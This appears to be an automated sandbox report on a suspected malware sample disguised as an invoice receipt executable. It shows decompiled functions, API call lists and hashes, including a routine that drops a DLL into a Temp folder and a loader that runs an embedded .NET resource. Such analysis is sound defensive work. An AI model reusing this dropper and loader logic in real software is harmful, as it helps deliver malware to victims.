Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 530164218-1075807775
Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58

Uniqueness

Uniqueness Score: -1.00%

Function 00404D73, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}

0x00404d7f
0x00404da4
0x00404dc4
0x00404dc7
0x00404dca
0x00404de1
0x00404de7
0x00404dee
0x00404df5
0x00404dfc
0x00404e01
0x00404e07
0x00000000
0x00404e17
0x00404db1
0x00404e04
0x00404e04
0x00000000
0x00404e04
0x00404dbd
0x00404dbf
0x00000000
0x00404dbf
0x00404d85
0x00000000
0x00000000
0x00404d8c
0x00000000

APIs

IsWindowVisible.USER32 ref: 00404DA9
CallWindowProcA.USER32 ref: 00404E17

Part of subcall function 00403E83: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E95

Strings

, xrefs: 00404D81

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsiCC2.tmp\esrskf.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004024b0
0x004024b0
0x004024b3
0x004024ce
0x004024b5
0x004024b7
0x004024bc
0x004024c3
0x004024d5
0x0040264e
0x0040264e
0x004024db
0x004024ed
0x004015a6
0x004015a8
0x00000000
0x004015ae
0x004015a8
0x00402880
0x0040288c

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsiCC2.tmp\esrskf.dll,00000000,?,?,00000000,00000011), ref: 004024ED

Strings

C:\Users\user\AppData\Local\Temp\nsiCC2.tmp\esrskf.dll, xrefs: 004024BC, 004024E1

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsiCC2.tmp\esrskf.dll
API String ID: 427699356-3339283526
Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004055BF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x004055c0
0x004055ca
0x004055cc
0x004055d3
0x004055db
0x00000000
0x00000000
0x00000000
0x004055db
0x004055dd
0x004055e2

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe,C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe,80000000,00000003), ref: 004055C5
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe,C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe,80000000,00000003), ref: 004055D3

Strings

C:\Users\user\Desktop, xrefs: 004055BF

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1669384263
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9

Uniqueness

Uniqueness Score: -1.00%

Function 004056D1, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x004056dd
0x004056df
0x00405707
0x004056ec
0x004056f1
0x004056fc
0x00000000
0x00405719
0x00405705
0x00405705
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: G2M8C76V_INV0ICE_RECEIPT.exe PID: 7092 Parent PID: 6964 G2M8C76V_INV0ICE_RECEIPT.exeCOMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.7%
Total number of Nodes:	1513
Total number of Limit Nodes:	7

Executed Functions

Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}

0x0040149f
0x004014a5
0x004014a9
0x004014ec
0x004014ee
0x004014ee
0x004014b7
0x004014bb
0x004014c7
0x004014cd
0x004014d3
0x004014d8
0x004014e0
0x004014e0
0x004014d8
0x004014e6
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD

Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037

FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
ExitProcess.KERNEL32 ref: 004014EE

Strings

v2.0.50727, xrefs: 00401053

Memory Dump Source

Source File: 00000003.00000001.294728668.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
String ID: v2.0.50727
API String ID: 2372384083-2350909873
Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679

Uniqueness

Uniqueness Score: -1.00%

Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}

0x00401e22
0x00401e28

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22

Memory Dump Source

Source File: 00000003.00000001.294728668.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040446F, Relevance: 4.6, APIs: 3, Instructions: 78
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x412014; // 0x910369bd
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00401E6A(_t41);
					_pop(_t60);
				}
				E00402460(_t65,  &_v804, 0, 0x50);
				E00402460(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00401E6A(_t57);
				}
				E004018CC();
				return _t57;
			}

0x0040446f
0x0040446f
0x0040446f
0x0040447a
0x0040447f
0x00404481
0x00404488
0x00404489
0x0040448b
0x0040448e
0x00404493
0x00404493
0x0040449f
0x004044b2
0x004044c0
0x004044c6
0x004044cc
0x004044d2
0x004044d8
0x004044de
0x004044e4
0x004044ea
0x004044f0
0x004044f6
0x004044fd
0x00404504
0x0040450b
0x00404512
0x00404519
0x00404520
0x00404521
0x0040452a
0x00404530
0x00404533
0x00404539
0x00404546
0x0040454f
0x00404558
0x00404561
0x0040456f
0x00404571
0x0040457e
0x00404586
0x00404592
0x00404595
0x0040459a
0x004045a1
0x004045a9

APIs

IsDebuggerPresent.KERNEL32 ref: 00404567
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E

Memory Dump Source

Source File: 00000003.00000001.294728668.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
Opcode Fuzzy Hash: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49

Uniqueness

Uniqueness Score: -1.00%

Function 004067FE, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004067FE() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4132b0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x004067fe
0x00406806
0x0040680e

APIs

GetProcessHeap.KERNEL32 ref: 004067FE

Memory Dump Source

Source File: 00000003.00000001.294728668.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.294779978.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08

Uniqueness

Uniqueness Score: -1.00%

Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x910369bd
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

0x004078d4
0x004078d5
0x004078d6
0x004078dd
0x004078e2
0x004078e8
0x004078ee
0x004078f4
0x004078f7
0x004078f7
0x004078fa
0x004078fc
0x004078fc
0x004078fa
0x004078fe
0x00407903
0x0040790a
0x0040790d
0x0040790d
0x00407929
0x0040792f
0x00407934
0x00407ac7
0x00407ad2
0x00407ada
0x0040793a
0x0040793a
0x0040793d
0x00407942
0x00407946
0x0040799a
0x0040799a
0x0040799c
0x0040799e
0x00407abc
0x00407abc
0x00407abe
0x00407abf
0x00407ac5
0x00000000
0x00407ac5
0x004079af
0x004079b5
0x004079b7
0x00000000
0x00000000
0x004079bd
0x004079cf
0x004079d4
0x004079d8
0x00000000
0x00000000
0x004079e5
0x00407a1f
0x00407a22
0x00407a25
0x00407a27
0x00407a29
0x00407a2b
0x00407a77
0x00407a77
0x00407a79
0x00407a79
0x00407a7b
0x00407ab5
0x00407ab6
0x00000000
0x00407abb
0x00407a8f
0x00407a94
0x00407a96
0x00000000
0x00000000
0x00407a9a
0x00407a9b
0x00407a9c
0x00407a9f
0x00407adb
0x00407ade
0x00407aa1
0x00407aa1
0x00407aa2
0x00407aa2
0x00407aaf
0x00407ab1
0x00407ab3
0x00407ae4
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ab3
0x00407a2d
0x00407a30
0x00407a32
0x00407a34
0x00407a36
0x00407a39
0x00407a3e
0x00407a59
0x00407a5b
0x00407a65
0x00407a67
0x00407a68
0x00407a6a
0x00000000
0x00000000
0x00407a6c
0x00407a72
0x00407a72
0x00000000
0x00407a72
0x00407a40
0x00407a42
0x00407a46
0x00407a4b
0x00407a4d
0x00407a4f
0x00000000
0x00000000
0x00407a51
0x00000000
0x00407a51
0x004079e7
0x004079ec
0x00000000
0x00000000
0x004079f2
0x004079f4
0x00000000
0x00000000
0x00407a10
0x00407a14
0x00000000
0x00000000
0x00000000
0x00407a1a
0x0040794d
0x0040794f
0x00407951
0x00407959
0x00407978
0x0040797a
0x00407984
0x00407986
0x00407987
0x00407989
0x00000000
0x00000000
0x0040798f
0x00407995
0x00407995
0x00000000
0x00407995
0x0040795d
0x00407961
0x00407966
0x0040796a
0x00000000
0x00000000
0x00407970
0x00000000
0x00407970

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
__alloca_probe_16.LIBCMT ref: 00407961
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
__alloca_probe_16.LIBCMT ref: 00407A46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
__freea.LIBCMT ref: 00407AB6

Part of subcall function 00403E3D: HeapAlloc.KERNEL32(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

__freea.LIBCMT ref: 00407ABF
__freea.LIBCMT ref: 00407AE4

Memory Dump Source

